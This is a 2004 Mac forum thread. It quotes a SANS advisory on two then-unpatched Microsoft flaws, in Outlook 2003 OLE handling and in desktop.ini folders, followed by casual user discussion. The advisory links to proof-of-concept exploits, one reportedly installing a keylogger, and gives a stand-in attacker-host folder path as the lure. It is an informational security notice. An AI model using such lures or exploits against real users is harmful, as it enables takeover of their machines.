New Windows vulnerabilities

Discussion in 'General Mac Discussion' started by Westside guy, May 24, 2004.

  1. macrumors 601

    Westside guy

    Joined:
    Oct 15, 2003
    Location:
    The soggy part of the Pacific NW
    #1
    Hi there,

    Not sure how to post this without starting a flame war. :D But (mainly for the "Windows is only vulnerable due to non-patched machines" crowd) I thought it was worth mentioning two recently announced vulnerabilities hot off the SANS newswire. They're the first not-already-patched exploits I've seen in several weeks, but it's not an uncommon problem.

    Out of fairness I'll also point out the same issue listed the OS X "Help Protocol" exploit, which was patched last Friday.

    #1 HIGH: Microsoft Outlook Arbitrary Code Execution
    Affected: Outlook 2003

    Description: The default security setting of Outlook 2003 ("Restricted Zone") does not allow execution of Active-X controls and arbitrary scripts. However, it is reported that an email containing an embedded OLE object such as a Windows media player, can bypass these security checks. By exploiting this flaw in conjunction with the Outlook's flaw of storing files specified in "img" tags at a predictable location, it may be possible to silently execute arbitrary code on the client system. The code would execute with the privileges of the logged-on user. A proof-of-concept exploit has been posted.

    Status: Microsoft has not confirmed, no updates available.

    References:
    Postings by http-equiv
    http://archives.neohapsis.com/archives/ntbugtraq/2004-q2/0058.html
    http://archives.neohapsis.com/archives/ntbugtraq/2004-q2/0056.html
    Proof-of-Concept Exploit
    http://www.malware.com/rockIT.zip
    OLE Concepts
    http://support.microsoft.com/support/kb/articles/Q86/0/08.asp&NoWebContent=1
    SecurityFocus BIDs
    http://www.securityfocus.com/bid/10369
    http://www.securityfocus.com/bid/10307

    #2 MODERATE: Windows Folder Arbitrary Code Execution
    Affected: Windows XP/2000

    Description: The "desktop.ini", a hidden file when present in a Windows folder, instructs Windows Explorer how to display the folder's contents. A problem arises when the ".ShellClassInfo" section in a folder's desktop.ini file points to an executable program. This can be exploited to execute arbitrary code on a client system when an unsuspecting user opens such a specially crafted folder. To exploit the flaw, an attacker would have to create the malicious "shared" folder and entice a victim to open it. The attacker can include the folder's URI for e.g. \\attacker-ip\bad-folder, in a webpage or email it to a potential victim. Proof-of-Concept exploit that installs a keylogger on the client system has been publicly posted.

    Status: Microsoft has not confirmed, no patches available. Block the ports 139/tcp and 445/tcp at the network perimeter to prevent attacks from the Internet.

    References:
    Posting by Roozbeh Afrasiabi
    http://www.securityfocus.com/archive/1/363590/2004-05-17/2004-05-23/0
    Proof-of-Concept Exploit
    http://www.freewebs.com/roozbeh_afrasiabi/xploit/execute.htm
    Desktop.ini File Details
    http://msdn.microsoft.com/library/e...hell_basics/shell_basics_extending/custom.asp
    SecurityFocus BID
    http://www.securityfocus.com/bid/10363
     
  2. Moderator emeritus

    robbieduncan

    Joined:
    Jul 24, 2002
    Location:
    London
    #2
    Whilst unsurprising that there are undiscovered flaws in MS programs the first is not a Windows flaw. It's an Outlook 2003 flaw. There are many Windows machines without Outlook 2003.
     
  3. macrumors 68030

    johnnyjibbs

    Joined:
    Sep 18, 2003
    Location:
    London, UK
    #3
    How many security flaws aren't to do with Outlook, Outlook Express or IE? :D :D
     
  4. macrumors G4

    wrldwzrd89

    Joined:
    Jun 6, 2003
    Location:
    Solon, OH
    #4
    Although the first flaw is technically an Outlook 2003 flaw rather than one in Windows itself, it still qualifies as a Windows flaw since Outlook 2003 is not available for platforms other than Windows. Both flaws are also Microsoft flaws, regardless of which program(s) they affect. I'm glad I don't use Windows (at home)!
     
  5. macrumors 65816

    tomf87

    Joined:
    Sep 10, 2003
    #5
    This doesn't make any sense whatsoever. So, if Apple's Final Cut Pro application has a flaw, then it is an OS X flaw as well? That doesn't make sense. While they do have the same manufacturer, one is an application and the other is an operating system.
     
  6. macrumors G4

    wrldwzrd89

    Joined:
    Jun 6, 2003
    Location:
    Solon, OH
    #6
    I was just trying to explain what I thought the original poster's logic was...I guess I failed (either that, or I succeeded, but the logic was wrong anyway).
     
  7. macrumors 65816

    tomf87

    Joined:
    Sep 10, 2003
    #7
    Either way, it doesn't matter. My mind is computing data well today anyway, so I could be wrong as well. :)
     
  8. Moderator emeritus

    edesignuk

    Joined:
    Mar 25, 2002
    Location:
    London, England
    #8
    Don't forget IIS! That's a biggie! :eek:
     
  9. macrumors G4

    wrldwzrd89

    Joined:
    Jun 6, 2003
    Location:
    Solon, OH
    #9
    IMO, Microsoft's IIS has as many security holes as 2,000 slices of Swiss cheese (which is FAR too many).
     
  10. Moderator emeritus

    mkrishnan

    Joined:
    Jan 9, 2004
    Location:
    Grand Rapids, MI, USA
    #10
    Hmmm...if I understand this correctly, this could potentially be pasted into any zip'd file (install file, etc) containing folders, and would then act when the folders were opened by a user with active desktop enabled, right? If that's so, I'm surprised its floated around for so long. :( Of course, maybe that's cuz everyone's turning off active desktop and going classic as soon as they get their Win PC's.... :D
     
  11. thread starter macrumors 601

    Westside guy

    Joined:
    Oct 15, 2003
    Location:
    The soggy part of the Pacific NW
    #11
    This poster's original logic was thus: While this is indeed a flaw in Outlook, because of the way Windows is constructed many "Outlook flaws" end up actually residing in Internet Explorer's code base (don't know about this one). As such, they are often part of the actual operating system code rather than stand-alone. That's why some recent "Outlook flaws" were exploitable whether or not Outlook was actually running.

    Also, there are lots of cross-dependencies on Windows. I know on our home XP box we cannot (at least according to XP) uninstall Outlook without breaking some other programs' functionality - even though we don't use Outlook.
     
  12. macrumors 68000

    Mav451

    Joined:
    Jul 1, 2003
    Location:
    Maryland
    #12
    Haha, I haven't heard the term "active desktop" since 1999...talk about a trip through time.
     
  13. macrumors G4

    wrldwzrd89

    Joined:
    Jun 6, 2003
    Location:
    Solon, OH
    #13
    My understanding is that this particular flaw can be exploited regardless of Active Desktop settings. The only thing I think it might depend on is that "Use Web-style folders" for Explorer is enabled (I don't know if the desktop.ini and folder.htt files are used when Web folders are disabled).
     
  14. Moderator emeritus

    mkrishnan

    Joined:
    Jan 9, 2004
    Location:
    Grand Rapids, MI, USA
    #14
    Oh, sorry. LOL this is what I was thinking of when I said active desktop. :eek: I guess they don't call it that anymore. I haven't used XP all that much. But yeah, I really hate web-style folders and I always turn them off.

    But still, my point, hasn't this flaw basically existed as long as web-style folders, i.e. a REALLY long time?
     
  15. macrumors G4

    wrldwzrd89

    Joined:
    Jun 6, 2003
    Location:
    Solon, OH
    #15
    You're probably right - odds are good that ever since Windows started using Web-style folders (can't remember if this was in Win95 first or Win98), this particular flaw has been present.
     
  16. macrumors 603

    SiliconAddict

    Joined:
    Jun 19, 2003
    Location:
    Chicago, IL
    #16

    Win98 started it and it is the most annoying thing on the planet. I can't tell you how many damn times I've had the wonderful error message of "Can not delete file. File is in use" or something along those lines simply because MS is previewing the damn thing in the web portion of the file browser. I ALWAYS turn this feature off for several reasons the biggest being that it slows down the browsing process. When I'm powering through a folder structure to move files I don't need a damn cute web interface to get in the way. Actually the coolest most innovative design MS did was the address bar in the file browser. I can power through a path with the auto filling options. Screw point and click. The way MS did it was a hybrid of the two methods.

    Beyond that #1 doesn't affect me since my mail server bounces back any HTML mail to the sender with a nice message. "Please send any e-mails to Jonathan in non-HTML format. Thanks." I neither care for nor need HTML mail. Give me RTF text. That's good enough for me and it guarantees that a scrip isn't going to be embedded into my email that will decimate my computer.
     
  17. Moderator emeritus

    mkrishnan

    Joined:
    Jan 9, 2004
    Location:
    Grand Rapids, MI, USA
    #17
    Yeah, I love this feature too -- especially with autocomplete. I use it like crazy. When the whole active desktop / MSIE integration issue was floating around, I was worried that they would remove this in order to comply with the ruling! :( So I was glad they didn't....
     

Share This Page